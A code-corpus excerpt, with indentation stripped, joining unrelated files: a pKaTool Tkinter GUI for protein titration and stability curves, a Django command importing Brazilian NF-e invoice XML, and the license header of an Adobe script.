self.pkamethod_menu.add_radiobutton(label=method,
variable=self.pkamethod_sel,
value=method,
indicatoron=1,
command=self.update_pkasystem_curves)
self.pkamethod_button.grid(row=0,column=7,sticky='news')
#
# Monte Carlo steps
#
self.MCsteps=IntVar()
self.mcsteps_scale=Scale(self.win,from_=0,to=2500,resolution=100,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,
variable=self.MCsteps,
state=DISABLED,
label='Monte Carlo steps')
self.MCsteps.set(self.numgrps*100)
self.mcsteps_scale.grid(row=0,column=8,sticky='news')
#
# Button for updating the titration curves
#
stab_test=Button(self.win,text='Update curves',command=self.update_pkasystem_curves)
stab_test.grid(row=0,column=9,sticky='wens')
#
# Reposition the window with the titration curves according to the
# size of the control window
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.titwin.geometry('+%d+%d' %(xorg-5,yorg+height+5))
#
# Draw the first curves
#
self.titwin.update()
self.win.update()
self.init_not_done=None
self.titwin.update()
self.win.update()
self.activate_callbacks()
#if self.master.update:
# self.update_pkasystem_curves()
#
# Done
#
return
#
# -----
#
def about(self):
"""Print the About section"""
import tkMessageBox
tkMessageBox.showinfo("pKaTool / pKaSystem",
'pKaTool version %s\nAuthors: Jens Erik Nielsen & Chresten S¯ndergaard\n\nCopyright (c) Jens Erik Nielsen\nUniversity College Dublin 2003-2007\nAll rigths reserved\nhttp://enzyme.ucd.ie/Science/pKa\n\nPlease remember to cite:\nAnalysing the pH-dependent properties of proteins using pKa calculations\nNielsen JE\nJ Mol Graph Model 2007 Jan;25(5):691-9\n\nIf using the NMR fitting routines please cite:\n\nDetermination of electrostatic interaction energies and protonation state populations in enzyme active sites\nS¯ndergaard CR, McIntosh LP, Pollastri G, Nielsen JE\nJ. Mol. Biol. (in press).' %__pKaSystemVersion__,parent=self.master)
return
#
# --------------------
#
def get_geometry(self,widget):
"""Get the geometry of a widget
Return width,height,xorg,yorg"""
widget.update_idletasks()
txt=widget.winfo_geometry()
width=int(txt.split('x')[0])
rest=txt.split('x')[1]
height=int(rest.split('+')[0])
xorg=int(rest.split('+')[1])
yorg=int(rest.split('+')[2])
return width,height,xorg,yorg
#
# -------
#
def quit_application(self):
"""Quit application"""
self.win.destroy()
self.titwin.destroy()
return
#
# --------------------
#
def snapshot(self):
#
# Preserve the current lines (for making figures)
#
x=0
for line in self.lines.keys():
x=x+1
if x==1:
self.tc.delete(line)
else:
self.to_clear.append(line)
del self.lines[line]
if x==2:
x=0
return
#
# --------------------
#
def print2file(self):
#
# Print Canvas to file
#
import sys, os
if not self.lastdir:
self.lastdir=os.getcwd()
filename=tkFileDialog.asksaveasfilename(defaultextension='.ps',
initialdir=self.lastdir,
filetypes=[("Postscript files","*.ps"),("All files","*.*")])
if filename:
self.write_psfile(filename)
else:
return
return
#
# --------------------
#
def write_psfile(self,filename):
"""
# Dump the Canvas to a postscript file
"""
import os
self.lastdir=os.path.split(filename)[0]
if filename[-3:]!='.ps':
filename=filename+'.ps'
self.tc.postscript(colormode='color',file=filename)
return
#
# --------------------
#
def clear(self,junk=None):
#
# Clear all lines
#
for line in self.to_clear:
self.tc.delete(line)
return
#
# --------------------
#
def stability_on_off(self):
"""Open a window for drawing the stability curve"""
#
# Should we open the stability window?
#
new=self.stability_var.get()
if new=='on' and self.old_stab_status!='on':
#
# Yes, open it
#
self.stab_test_on=1
self.old_stab_status='on'
self.stab_window=Toplevel()
#
self.stabwidth=1000
self.stabheight=300
self.stab_window.geometry('%dx%d+10+20' %(self.stabwidth,self.stabheight))
self.stab_window.title('pH dependence of protein stability')
self.stab_tc=Canvas(self.stab_window,bd=5,bg='white',width=self.titwidth,height=self.titheight,scrollregion=(0,0,self.titwidth,self.titheight))
self.stab_tc.xview("moveto", 0)
self.stab_tc.yview("moveto", 0)
self.stab_tc.grid(row=1,column=0)
#
# Plotting button
#
def print_curve(event=None):
Button(self.stab_window,command=print_curve).grid(row=0,column=0)
# pH axis
self.stab_startx=80
self.stab_endx=910
self.stab_starty=160
self.stab_endy=10
self.pH_axis(self.stab_tc,self.stab_startx,self.stab_starty,
self.stab_endx,self.stab_endy)
#
# Controls for unfolded pKa values
#
self.U_control=Toplevel()
self.U_control.title('Controls for Unfolded form')
self.U_control.geometry('+10+10')
self.unfolded_groups={}
for id_num in range(self.numgrps):
int_ene=1
#colour=self.colour_order[id_num%len(self.colour_order)]
self.unfolded_groups[id_num]=group_control.group_control(self,
self.startrow+id_num,id_num,
self.numgrps,int_ene,self.colour_order,window=self.U_control)
#
# If we are displaying real groups then set the intrinsic pKa to the model pKa value
#
if self.parent_application:
intpKa_folded=self.groups[id_num].modelpK
else:
intpKa_folded=self.groups[id_num].intpka.get()
#
self.unfolded_groups[id_num].intpka.set(intpKa_folded)
#
#
#
row=self.startrow+self.numgrps+1
self.show_grp_contribs=IntVar()
self.show_grp_contribs.set(0)
grp_contribs=Checkbutton(self.U_control,text='Show residue contributions',
onvalue=1,offvalue=0,variable=self.show_grp_contribs,command=self.update_pkasystem_curves)
grp_contribs.grid(row=row,column=0)
#
# Which contribution should we draw
#
self.contrib_type=IntVar()
self.contrib_type.set(1)
Radiobutton(self.U_control,text='contributions from pKa shifts',variable=self.contrib_type,value=1,command=self.update_pkasystem_curves).grid(row=row,column=1)
#Radiobutton(self.U_control,text='charge-charge contributions',variable=self.contrib_type,value=2,command=self.update_curves).grid(row=row,column=2)
#
# Should we show min and max stabilisation?
#
self.show_min_max_stab=IntVar()
self.show_min_max_stab.set(1)
Checkbutton(self.U_control,text='Show min and max stabilisation',
onvalue=1,
offvalue=0,
variable=self.show_min_max_stab,
command=self.update_pkasystem_curves).grid(row=row,column=3)
#
# Update curves
#
self.window.update()
self.U_control.update()
self.stab_test_on=None
self.update_pkasystem_curves()
#
# Move the windows to sensible positions
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.U_control.geometry('+%d+%d' %(xorg,yorg+height))
#
width,height,xorg,yorg=self.get_geometry(self.U_control)
self.stab_window.geometry('+%d+%d' %(xorg,yorg+height))
#
# Activate the callbacks for the unfolded groups
#
self.activate_callbacks()
else:
self.old_stab_status='off'
self.stab_window.destroy()
self.U_control.destroy()
return
#
# --------------------
#
def dummy(self,event=None):
"""Dummy callback function"""
return
#
# ----
#
def setup_system(self,group_array,X,energies=None):
"""Set up the system of titratable groups from the info in group_array"""
import string
#
# Create the description of the system
#
self.names={}
self.ids={}
for group in group_array.keys():
name=':'+string.zfill(group,4)+':'
if group_array[group].acid_base.get()==1:
name=name+'ASP'
else:
name=name+'ARG'
self.names[group]=name
self.ids[name]=group
#
# Update experimtal data dictionary to new names...
#
if getattr(self,'titration_data',None):
for old_key in self.titration_data.keys():
for new_key in self.names:
if int(old_key[1:5]) == int(self.names[new_key][1:5]):
nk = old_key[0:6]+self.names[new_key][6:]
self.titration_data[self.names[new_key]]=self.titration_data[old_key]
if not old_key == self.names[new_key]:
del self.titration_data[old_key]
#
# Add all data
#
matrix={}
X.intene={}
X.intrinsic_pKa={}
for group in group_array.keys():
#
# Set everything
#
name1=self.names[group]
# Int pKa
intpka=group_array[group].intpka.get()
X.intrinsic_pKa[name1]=intpka
type=group_array[group].acid_base.get()
#
# Set the interaction energies
#
if not X.intene.has_key(group):
X.intene[name1]={}
matrix[name1]={}
for group2 in group_array[group].intenes.keys():
type2=group_array[group2].acid_base.get()
name2=self.names[group2]
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group].intenes[group2].get()
else:
X.intene[name1][name2]=-group_array[group].intenes[group2].get()
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
# We only have part of the interaction energies in each group
# This is because the interaction energy is stored as a single
# Tk variable
#
for group2 in group_array.keys():
name2=self.names[group2]
type2=group_array[group2].acid_base.get()
if group2!=group:
if group_array[group2].intenes.has_key(group):
#
# Is this group active?
#
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group2].intenes[group].get()
else:
X.intene[name1][name2]=-group_array[group2].intenes[group].get()
#
# Matrix of distances
#
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
else:
X.intene[name1][name2]=0.0
# Default distance for zero interaction energy
if name1!=name2:
matrix[name1][name2]=self.E2dist(0.0,energies)
#
# All Done
#
return matrix
#
# -----------------
#
def E2dist(self,E,energies=None):
"""
# convert an electrostatic interaction energy to a distance
# Units: E(kT), dist: A
If energies==1, then we do not convert the energy"""
#
# Check if we should return energies
#
import math
if energies:
return E
#
# No, return distances
#
E=abs(E) # the sign doesn't matter
if E>0.001:
#
# Look in Tynan-Connolly and Nielsen, Protein Science: Re-Designing protein pKa values
# for details on the formula below
#
eps=1.0 # We set eps to 1, and scale distances afterwards
distance=243.3*math.log(10.0)/(eps*E)
else:
distance=1000.0
return distance
#
# ------------------
#
def calc_pKas_from_scales(self,group_array):
"""Calculate pKa values for the system"""
#
# Fill instance with data
#
X=self.pkamethods[self.pkamethod_sel.get()]()
MCsteps=0
if self.pkamethod_sel.get()=='Monte Carlo':
MCsteps=self.MCsteps.get()
self.mcsteps_scale.configure(state=ACTIVE)
elif self.pkamethod_sel.get()=='Monte Carlo (C++)':
MCsteps=200000
else:
self.mcsteps_scale.configure(state=DISABLED)
#
matrix_dummy=self.setup_system(group_array,X)
#
# Set the pKa value variables
#
X.groups=X.intrinsic_pKa.keys()
X.groups.sort()
#
# Make a list of experimental pH values to include in calculation
#
exp_pHs =[]
if getattr(self,'titration_data',None):
for group in self.titration_data.keys():
for pH in self.titration_data[group].keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# also include pH values from loaded ph-activity profile
#
if getattr(self,'activity_data',None):
for pH in self.activity_data.keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# and also from ftir data
#
if getattr(self, 'FTIR_win',None):
for pH in self.FTIR_win.ftir_data.keys():
if exp_pHs.count(pH) ==0:
exp_pHs.append(pH)
#
# Include the effect of non-system groups?
#
if hasattr(self,'non_system_groups'):
if self.non_system_groups:
X.non_system_groups={}
for group_id in self.non_system_groups.keys():
name=self.names[group_id]
X.non_system_groups[name]=self.non_system_groups[group_id].copy()
#
# Get the pKa values
#
pKa_values,prot_states=X._calc_pKas(mcsteps=MCsteps,
phstep=self.pHstep.get(),
phstart=self.pHstart,
phend=self.pHend,
exp_pHs=exp_pHs,
verbose=1)
return X,pKa_values,prot_states
#
# -----------------
#
def update_scales(self,junk=None,draw=1,doit=None):
"""Update the scale widgets when the user moves a dial"""
#
# Folded (normal) groups
#
for group in self.groups.keys():
self.groups[group].update_scales()
#
# Update the unfolded scales if theyr're active
#
if self.stability_var.get()=='on':
for group in self.unfolded_groups.keys():
self.unfolded_groups[group].update_scales()
#
# Redraw everything
#
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_scales_from_fit(self,junk=None,draw=1,doit=None):
#
# update group scales from fitter
#
for group in self.groups:
self.groups[group].update_scales_from_fit()
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_pkasystem_curves(self,junk=None,draw=1,doit=None):
"""Update all curves"""
if self.init_not_done:
return
if self.stab_test_on and doit==None:
return
#
# Redraw the curves
#
import string, pKarun
PKana=pKarun.pKa_general.pKanalyse()
#
# Calculate pKa values for the folded form
#
X,pKa_values,prot_states=self.calc_pKas_from_scales(self.groups)
self.pKa_calc_instance=X
if not draw:
return X
#
# Set the pKa values
#
for group in pKa_values.keys():
self.groups[self.ids[group]].update_group_control()
self.groups[self.ids[group]].pkavalue.set("%4.1f" %pKa_values[group])
#
# Set the HH fit
#
solution,sq=PKana.fit_to_henderson(X.prot_states[group])
try:
self.groups[self.ids[group]].HHfit.set('%5.2f (%4.2f / %3.2f)' %(abs(float(solution[1])),abs(float(solution[0])),float(sq)))
except:
self.groups[self.ids[group]].HHfit.set('HH-fit error')
#
# Delete all lines from last round
#
for line in self.lines.keys():
self.tc.delete(line)
del self.lines[line]
# Draw the titration curves
self.titration_curves={}
groups=pKa_values.keys()
groups.sort()
group_count=0
colour_map = {}
for group in groups:
#
# Store everything in self.titration_curves
#
self.titration_curves[group]=X.prot_states[group].copy()
#
# Is this group active?
#
if self.groups[group_count].active.get()==0:
group_count=group_count+1
continue
#
# Yes
#
style=self.groups[group_count].style.get()
lastpH=X.pHvalues[0]
lastcrg=X.prot_states[group][lastpH]
colour=self.colour_order[group_count%len(self.colour_order)]
colour_map[group] = colour
#
for pH in X.pHvalues[1:]:
lastx,lasty=self.get_xy(lastpH,lastcrg)
crg=X.prot_states[group][pH]
x,y=self.get_xy(pH,crg)
if style==1:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth))]=1
else:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth,
dash=(1,2)))]=1
lastcrg=crg
lastpH=pH
#
# Update the counter for colours
#
group_count=group_count+1
#
# Should we draw the microscopic states?
#
if self.micro_var.get()==1:
self.update_microstates(X)
else:
self.close_state_win()
#
# Should we draw the stabilty curves?
#
stab_status=self.stability_var.get()
if stab_status=='on':
self.stability=self.do_stab_curve(X)
#
# Should we display loaded titration curves?
#
#try:
# print 'titration_data', self.titration_data
#except:
# print 'no titration_data'
if self.display_loaded_curves.get()==1:
if not getattr(self,'titration_data',None):
import tkMessageBox
tkMessageBox.showwarning('No titration curves loaded',
'Load titration curves first')
self.display_loaded_curves.set(0)
else:
for group in self.titration_data.keys():
phvals=self.titration_data[group].keys()
phvals.sort()
for ph in phvals:
crg=self.titration_data[group][ph]
x,y=self.get_xy(ph,crg)
try:
f = colour_map[group]
except:
f = 'yellow'
handle=self.tc.create_oval(x-2,y-2,x+2,y+2,fill=f)
self.lines[handle]=1
#
# Is there an FTIR model to update?
#
if self.show_ftir.get() == 1:
if getattr(self, 'FTIR_win',None):
self.FTIR_win.draw_fit()
else:
self.FTIR_win = ftir_data.FTIR_data(self)
self.FTIR_win.draw_fit()
#
# Other callbacks?
#
self.check_other_callbacks()
return X
#
# -------
#
def check_other_callbacks(self):
"""self.callbacks holds a list of funcions that should be called"""
if not hasattr(self,'callbacks'):
self.callbacks=[]
for callback in self.callbacks:
callback()
return
def add_callback(self,function):
"""Add a callback function"""
self.check_other_callbacks()
add=1
for callback in self.callbacks:
if function==callback:
add=None
break
if add:
self.callbacks.append(function)
self.check_other_callbacks()
return
#
# -------------
#
def do_stab_curve(self,X):
""" Calculate the stability curve"""
#
# Make sure that the acid/base info for the unfolded form is the same
# as for the folded form
#
for group in self.unfolded_groups.keys():
acid_base=self.groups[group].acid_base.get()
self.unfolded_groups[group].acid_base.set(acid_base)
#
# Calculate pKa values for the unfolded form
#
UF,ufpKa_values,UF_prot_states=self.calc_pKas_from_scales(self.unfolded_groups)
for group in ufpKa_values.keys():
self.unfolded_groups[self.ids[group]].pkavalue.set("%4.1f" %ufpKa_values[group])
#
# Get all the interaction energies
#
ufmatrix=self.setup_system(group_array=self.unfolded_groups,X=UF,energies=1)
matrix=self.setup_system(group_array=self.groups,X=X,energies=1)
#
# Integrate
#
integral=0.0
intcurve=[]
intcurve2=[]
dpH=abs(X.pHvalues[0]-X.pHvalues[1])
min_val=99999
max_val=-9999
#
# Specify constants
#
k=1.3806503E-23
T=298.15
Na=6.02214199E23
#factor=k*T*Na/1000.0
# No don't do it
factor=1
import math
ln10=math.log(10)
#
# Loop over all pH values
#
stability={}
for pH in X.pHvalues:
intcurve.append(integral)
stability[pH]=integral #Dictionary that will be passed back
#
# Update min and max
#
if integral<min_val:
min_val=integral
if integral>max_val:
max_val=integral
#
# Calculate total stability
#
for group in ufpKa_values.keys():
integral=integral+ln10*dpH*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor
#
# Calculate the electrostatic interaction
#
integral2=0
for group in matrix.keys():
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g1_id=self.ids[group]
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
integral2=integral2+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
integral2=integral2-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
#
# Update min and max
#
if integral2<min_val:
min_val=integral2
if integral2>max_val:
max_val=integral2
intcurve2.append(integral2)
max_stabilisation=max_val
min_stabilisation=min_val
#
# Plot the whole thing
#
lastpH=X.pHvalues[0]
lastval=intcurve[0]
count=1
span=max_val-min_val
#
# Delete the lines from last time
#
for line in self.stab_lines.keys():
self.stab_tc.delete(line)
del self.stab_lines[line]
#
# Draw the y axis
#
canvas=self.stab_tc
x_axis=self.get_x(X.pHvalues[0])-20
y_axis=get_y_fromstab(min_val,span)
endy=get_y_fromstab(max_val,span)
self.stab_lines[canvas.create_line(x_axis,max([160,y_axis]),
x_axis,endy-10,fill='black',
width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis+10,endy-35,text='delta G of folding (kT)',fill='black',anchor='w')]=1
#
# Tick marks and tick labels
#
for tickval in range(int(min_val*100),int(max_val*100),int(max([(span*100.0)/5.0,1.0]))):
y=get_y_fromstab(tickval/100.0,span)
self.stab_lines[canvas.create_line(x_axis,
y,x_axis-5,y,
fill='black',width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis-25,y,text='%5.2f' %(
float(tickval)/100.0),fill='black')]=1
#
# Draw the stability lines
#
count=1
summed_contributions={}
label_position={}
for pH in X.pHvalues[1:]:
lastx=self.get_x(lastpH)
lasty=get_y_fromstab(lastval,span)
val=intcurve[count]
x=self.get_x(pH)
y=get_y_fromstab(val,span)
self.stab_lines[self.stab_tc.create_line(lastx,lasty,float(x),float(y),
fill='black',
width=self.linewidth)]=1
#
# Outline the contribution of each group
#
if self.show_grp_contribs.get()==1:
colour_count=0
null_y=get_y_fromstab(0.0,span)
starty_positive=null_y
starty_negative=null_y
ufgroups=ufpKa_values.keys()
ufgroups.sort()
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
#
# Make sure the dictionary is initialised
#
if not summed_contributions.has_key(group):
summed_contributions[group]=0.0
label_position[group]=None
#
# Get this contribution
#
dx=abs(lastx-x)
if self.contrib_type.get()==1:
#
# Here we get the stability contribution from pKa shifts
#
endy=get_y_fromstab(dpH*ln10*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor,span)-null_y
summed_contributions[group]=summed_contributions[group]+endy
else:
#
# Otherwise the stability contribution from charge-charge interactions
#
stab=0.0
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
stab=stab+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
stab=stab-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
endy=get_y_fromstab(stab,span)-null_y
summed_contributions[group]=endy
#
# Draw the box
#
endy=summed_contributions[group]
if endy>0:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_positive,lastx+1.5*dx,endy+starty_positive,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_positive*2+endy)/2.0
starty_positive=endy+starty_positive
else:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_negative,lastx+1.5*dx,endy+starty_negative,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_negative*2+endy)/2.0
starty_negative=endy+starty_negative
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Continue
#
lastval=val
lastpH=pH
count=count+1
#
# Put labels on the contributions
#
if self.show_grp_contribs.get()==1:
colour_count=0
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
x=self.get_x(X.pHvalues[-1])
y=label_position[group]
colour=self.colour_order[colour_count]
self.stab_lines[canvas.create_text(x+50,y,text=group,
fill=colour,
anchor='w')]=1
#
# Update colours
#
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Put in labels for min and max stabilisation
#
if self.show_min_max_stab.get()==1:
obj1=canvas.create_text(850,150,text='MAX destab: %5.2f kT' %max_stabilisation,fill='red',anchor='w')
obj2=canvas.create_text(850,180,text='MAX stab: %5.2f kT' %min_stabilisation,fill='blue',anchor='w')
self.stab_lines[obj1]=1
self.stab_lines[obj2]=1
#
# Do we have an experimental stability curve?
#
if self.exp_stab_curve:
for pH,ddG in self.exp_stab_curve:
x=self.get_x(pH)
y=get_y_fromstab(ddG,span)
self.stab_lines[canvas.create_oval(x-5,y-5,x+5,y+5)]=1
return stability
#
# ---------------
#
def start_geom(self):
"""Start geom opt"""
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
import dist_geom
GM=dist_geom.distance_optimisation(distance_matrix,self.titration_curves)
return
#
# ----
#
def do_geom(self):
#
# Do geometry optimisation
#
# Update distances
#
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
self.MD.set_eqdists(distance_matrix)
#diff=self.MD.EM(1)
#
# Delete old ovals
#
for oval in self.oval.keys():
self.geom_tc.delete(oval)
del self.oval[oval]
#
# Plot positions
#
group_count=0
groups=self.MD.atoms.keys()
groups.sort()
for grp in groups:
pos=self.MD.atoms[grp]['pos']
x=pos[0]
y=pos[1]
z=pos[2]
self.oval[self.geom_tc.create_oval(x-5,y-5,x+5,y+5,fill=self.colour_order[group_count])]=1
group_count=group_count+1
self.oval[self.geom_tc.create_text(10,10,anchor='nw',text='Sum of unsatisfied dists: %5.3f' %(diff))]=1
self.geom_window.after(100,self.start_geom)
return
#
# ----------------
#
def copy_to_Ekin(self):
"""Copy a titration curve or a population curve to the Ekin facility of EAT_DB"""
try:
import os,sys
import PEATDB.Ekin
except:
import tkMessageBox
tkMessageBox.showwarning('Cannot find PEAT',
'Cannot find PEAT_DB\nMake sure that you download PEAT from\nhttp://enzyme.ucd.ie/PEAT')
return
#
# Pick a group
#
self.pick_group=Toplevel()
self.pick_group.title('Pick a group')
self.pick_group.geometry('+200+200')
self.group_picked=IntVar()
count=0
groups=self.groups.keys()
groups.sort()
for group in groups:
Radiobutton(self.pick_group,text='%d:%s' %(group,self.groups[group].name.get()),
variable=self.group_picked,
value=count).grid(row=count,column=0)
count=count+1
self.group_picked.set(groups[0])
Button(self.pick_group,text='Copy group',command=self.copy_group).grid(row=count,column=0)
Button(self.pick_group,text='Cancel',command=self.cancel_copy_group).grid(row=count,column=1)
return
#
# ----
#
def copy_group(self,event=None):
"""Get the titration curve and send it to Ekin"""
group=None
for id in self.ids.keys():
if self.ids[id]==self.group_picked.get():
group=id
break
if not group:
raise 'Something very odd happended in copy_group'
#
# Get the data and reformat it
#
data=self.titration_curves[group].copy()
del data['pKa']
new_data={}
new_data[0]={}
new_data[1]={}
count=0
pHs=self.titration_curves[group].keys()
pHs.sort()
for pH in pHs:
new_data[0][count]=pH
new_data[1][count]=self.titration_curves[group][pH]
count=count+1
#
# Open Ekin, and load the data
#
import os,sys
import EAT_DB.Ekin
EK=EAT_DB.Ekin.Ekin(parent=self)
EK.pass_data(new_data)
#
# Destroy the little window
#
self.pick_group.destroy()
return
#
# ----
#
def cancel_copy_group(self,event=None):
"""Cancel copy group to Ekin"""
self.pick_group.destroy()
return
#
# -----------------
#
if __name__=='__main__':
import sys
if len(sys.argv)==2:
numgroups=int(sys.argv[1])
pKa_system(numgroups).mainloop()
else:
pKa_system().mainloop()
| mit | 2,878,138,869,651,541,500 | 35.954967 | 667 | 0.510268 | false | 3.820223 | false | false | false |
dudanogueira/microerp | microerp/producao/management/commands/nfe.py | 1 | 6041 | # -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
from cadastro.models import Cidade, Bairro
from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento
from account.models import User
from optparse import make_option
import os, csv, datetime
from django.utils.encoding import smart_unicode, smart_str
from xml.dom import minidom
from producao.models import FabricanteFornecedor
from producao.models import NotaFiscal
class Command(BaseCommand):
help = '''
Importa Nota Fiscal
'''
args = "--file notafiscal.xml,"
option_list = BaseCommand.option_list + (
make_option('--file',
action='store_true',
dest='arquivo',
help='Importa uma nota fiscal',
),
)
def handle(self, *args, **options):
arquivo = options.get('arquivo')
if options['arquivo']:
f = args[0]
try:
xmldoc = minidom.parse(f)
infNFE = xmldoc.getElementsByTagName('chNFe')[0]
idnfe = infNFE.firstChild.nodeValue[22:34]
nome_emissor = xmldoc.getElementsByTagName('xNome')[0]
nome = nome_emissor.firstChild.nodeValue
print "NOME DO EMISSOR: %s" % nome
print "ID NOTA FISCAL %s" % idnfe
emissor = xmldoc.getElementsByTagName('emit')[0]
cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue
# busca emissor
fornecedor,created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor)
fornecedor.nome = nome
fornecedor.save()
if created:
print "Fornecedor CRIADO: %s" % fornecedor
else:
print "Fornecedor encrontrado: %s" % fornecedor
total = xmldoc.getElementsByTagName('total')[0]
frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue
# criando NFE no sistema
nfe_sistema,created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe)
nfe_sistema.taxas_diversas = frete
nfe_sistema.save()
# pega itens da nota
itens = xmldoc.getElementsByTagName('det')
for item in itens:
# cada item da nota...
codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue
quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue
valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue
print u"ITEM: %s" % codigo_produto
print u"Quantidade: %s" % quantidade
print u"Valor Unitário: %s" % valor_unitario
# impostos
try:
aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue)
except:
aliquota_icms = 0
try:
aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue)
except:
aliquota_ipi = 0
try:
aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue)
except:
aliquota_pis = 0
try:
aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue)
except:
aliquota_cofins = 0
total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_cofins
total_impostos = aliquota_ipi
print "Valor %% ICMS: %s" % aliquota_icms
print "Valor %% IPI: %s" % aliquota_ipi
print "Valor %% COFNS: %s" % aliquota_cofins
print "Valor %% PIS: %s" % aliquota_pis
print "Incidência de %% impostos: %s" % total_impostos
# busca o lancamento, para evitar dois lancamentos iguais do mesmo partnumber
item_lancado,created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto)
# atualiza
item_lancado.quantidade= quantidade
item_lancado.valor_unitario= valor_unitario
item_lancado.impostos= total_impostos
# salva
item_lancado.save()
# busca na memoria automaticamente
item_lancado.busca_part_number_na_memoria()
# calcula total da nota
nfe_sistema.calcula_totais_nota()
# printa tudo
print "#"*10
print "NOTA %s importada" % nfe_sistema.numero
frete = nfe_sistema.taxas_diversas
produtos = nfe_sistema.total_com_imposto
print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos)
print "Produtos"
for lancamento in nfe_sistema.lancamentocomponente_set.all():
print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final)
except FabricanteFornecedor.DoesNotExist:
print u"Erro. Não encontrado Fornecedor com este CNPJ"
except:
raise
else:
print self.help
print self.args
| lgpl-3.0 | 3,257,614,420,050,963,000 | 45.438462 | 323 | 0.549114 | false | 3.770768 | false | false | false |
shinho/SC2 | bin/add-opt-in.py | 1 | 7666 | #!/usr/bin/env python
# Copyright (c) 2012, Adobe Systems Incorporated
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Adobe Systems Incorporated nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
